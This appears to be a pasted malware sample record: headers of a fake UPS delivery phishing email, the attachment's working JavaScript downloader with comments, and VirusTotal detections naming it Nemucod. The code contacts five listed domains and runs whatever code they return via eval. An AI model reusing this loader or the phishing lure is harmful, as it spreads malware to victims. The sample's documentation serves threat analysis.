
hay

a guest
Mar 6th, 2017
Received: from exim by mail3.eqx.gridhost.co.uk with spam-scanned (Exim 4.63)
    (envelope-from <presta@www.e-conrad.iq.pl>)
    id 1cjhM2-0008LB-OV
    for info@haymarketdental.com; Fri, 03 Mar 2017 07:10:23 +0000
X-Spam-Checker-Version: SpamAssassin 3.3.1 (2010-03-16) on
    spam-10-168-100-9.eqx.gridhost.co.uk
X-Spam-Level: **
X-Spam-Status: No, score=2.7 required=4.0 tests=BAYES_50,RCVD_IN_BRBL_LASTEXT,
    RDNS_NONE autolearn=no version=3.3.1
X-Spam-RelaysUntrusted: [ ip=46.248.165.161 rdns= helo=www.e-conrad.iq.pl
    by=mail3.eqx.gridhost.co.uk ident= envfrom=presta@www.e-conrad.iq.pl intl=0
    id=1cjhM2-0008Jw-MY auth= msa=0 ]
Received: from [46.248.165.161] (helo=www.e-conrad.iq.pl)
    by mail3.eqx.gridhost.co.uk with esmtps (TLSv1:AES256-SHA:256)
    (Exim 4.63)
    (envelope-from <presta@www.e-conrad.iq.pl>)
    id 1cjhM2-0008Jw-MY
    for info@haymarketdental.com; Fri, 03 Mar 2017 07:10:18 +0000
Received: from presta by www.e-conrad.iq.pl with local (Exim 4.80.1)
    (envelope-from <presta@www.e-conrad.iq.pl>)
    id 1cjhM1-0006mu-Mc
    for info@haymarketdental.com; Fri, 03 Mar 2017 08:10:17 +0100
To: info@haymarketdental.com
Subject: We have delivery problems with your parcel #004264707
X-PHP-Originating-Script: 1008:post.php(3) : regexp code(1) : eval()'d code(17) : eval()'d code
Date: Fri, 3 Mar 2017 08:10:17 +0100
Content-Type: multipart/mixed;
    boundary="bound1_9f49d9393cb5a33697a5f25c631fad12"
Content-Transfer-Encoding: 8bit
Message-Id: <E1cjhM1-0006mu-Mc@www.e-conrad.iq.pl>
From: presta@www.e-conrad.iq.pl

--bound1_9f49d9393cb5a33697a5f25c631fad12
Content-Type: text/plain; charset=us-ascii

Dear Customer,

Your item has arrived at the UPS Post Office at March 01, but the courier was unable to deliver parcel to you.

Please review delivery label in attachment!

Most sincerely,
Keith Levy,
UPS Delivery Agent.


--bound1_9f49d9393cb5a33697a5f25c631fad12
Content-Type: application/zip; name="UPS-Delivery-004264707.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename=UPS-Delivery-004264707.zip


--bound1_9f49d9393cb5a33697a5f25c631fad12--

function mesuto() {
    for (var i=0; i<x.length; i++)
    {
        // Create the HTTP client: ActiveXObject("Msxml2.XMLHTTP")
        var vDJmB = function(){
            return new ActiveXObject(g2);
        }();
        var e = vDJmB;

        try
        {
            // "\x6F" + "\x70\x65\x6E" decodes to the method name "open"
            var raspbna2s=["\x6F"+pi6dnz];
            // Synchronous GET to http://<x[i]>/counter/?<m>
            e[raspbna2s[9-9+0]]("G"+""+"E"+"T", t4 + ":"+ter+ter+x[i]+ter+"c"+"o"+"u"+"n"+"ter/?"+m,false);
            e.send();

            var r = e.responseText;

            // Accept only a response longer than 1000 characters that contains the marker m
            if (r.length > 999+1 && r.indexOf(m) > -1)
            {
                // Replace every occurrence of m with 'a', then eval() the result
                reqty(e.responseText.split(m).join('a'));

                break;
            };
        }
        catch(e)
        {
        };
    };
}

var g2 = "Msxml2.XMLHTTP";
var m = "TWwE8ZBQhl9uXU1h6TcaHDu7BA_vx6h4f-73rI1oXapZYv36uqMPzG0XhQf-Cx7VlZ3Mn-wTcskPW6RXWHM";
var x = new Array("jeannetaylordds.com", "wholesalehotelsuites.com", "lovingfloridalife.com", "jleaf.se", "iveybusiness.vmnow.co");
function reqty(fdga) { eval(fdga); }
var t4 = "http";
var pi6dnz = "\x70\x65\x6E";
var ter = "/";

mesuto();

https://www.virustotal.com/en/file/ff92c175370564f97f81c6265882bdbccd5134af1890bc03181700d4a1661b10/analysis/1488824666/

File identification
MD5 ec699c50bd7aefcdd86cbd955f001985
SHA1 5dc9fcd6b739835f226018b506d0647a93d83482
SHA256 ff92c175370564f97f81c6265882bdbccd5134af1890bc03181700d4a1661b10
ssdeep
File size 840 bytes ( 840 bytes )
File type unknown
Magic literal
TrID

VirusTotal metadata
First submission 2017-03-06 18:24:26 UTC ( 0 minutes ago )
Last submission 2017-03-06 18:24:26 UTC ( 0 minutes ago )
File names UPS-Delivery-004264707.zip

Contained files
This file is a compressed stream containing 1 file.
[+] UPS-Delivery-004264707.doc.zip ZIP 718 Bytes

Compression metadata
Contained files 1
Uncompressed size 718
Highest datetime 2017-03-03 08:10:16
Lowest datetime 2017-03-03 08:10:16

Contained files by extension
zip 1

Contained files by type
ZIP 1

ExifTool file metadata
MIMEType application/zip
ZipRequiredVersion 20
ZipCRC 0xb00050e4
FileType ZIP
ZipCompression Deflated
ZipUncompressedSize 718
ZipCompressedSize 682
FileTypeExtension zip
ZipFileName UPS-Delivery-004264707.doc.zip
ZipBitFlag 0
ZipModifyDate 2017:03:03 08:10:08

Microsoft TrojanDownloader:JS/Nemucod.ZZZ 20170306
NANO-Antivirus Trojan.Script.Nemucod.embvil 20170306
Kaspersky Trojan-Downloader.JS.Agent.nrs 20170306
ZoneAlarm by Check Point Trojan-Downloader.JS.Agent.nrs 20170306
K7AntiVirus Trojan ( 004dfe6d1 ) 20170306
K7GW Trojan ( 004dfe6d1 ) 20170306
TrendMicro TROJ_NEMUZIP.SMA1 20170306
TrendMicro-HouseCall TROJ_NEMUZIP.SMA1 20170306
Sophos Mal/DrodZp-A 20170306
Emsisoft JS:Trojan.JS.Agent.PLM (B) 20170306
ALYac JS:Trojan.JS.Agent.PLM 20170306
Ad-Aware JS:Trojan.JS.Agent.PLM 20170306
Arcabit JS:Trojan.JS.Agent.PLM 20170306
BitDefender JS:Trojan.JS.Agent.PLM 20170306
F-Secure JS:Trojan.JS.Agent.PLM 20170306
GData JS:Trojan.JS.Agent.PLM 20170306
eScan JS:Trojan.JS.Agent.PLM 20170306
ESET-NOD32 JS/TrojanDownloader.Nemucod.CKJ 20170306
McAfee JS/Nemucod.rj 20170306
McAfee-GW-Edition JS/Nemucod.rj 20170306
Fortinet JS/Nemucod.CKJ!tr.dldr 20170306
AVG JS/Downloader.Agent.70_S 20170306
Cyren JS/Downldr.HX1!Eldorado 20170306
F-Prot JS/Downldr.HX1!Eldorado 20170306
Baidu JS.Trojan-Downloader.Nemucod.ud 20170306
CAT-QuickHeal JS.Nemucod.CIS 20170306
DrWeb JS.DownLoader.1225 20170306
Comodo Heur.Dual.Extensions 20170306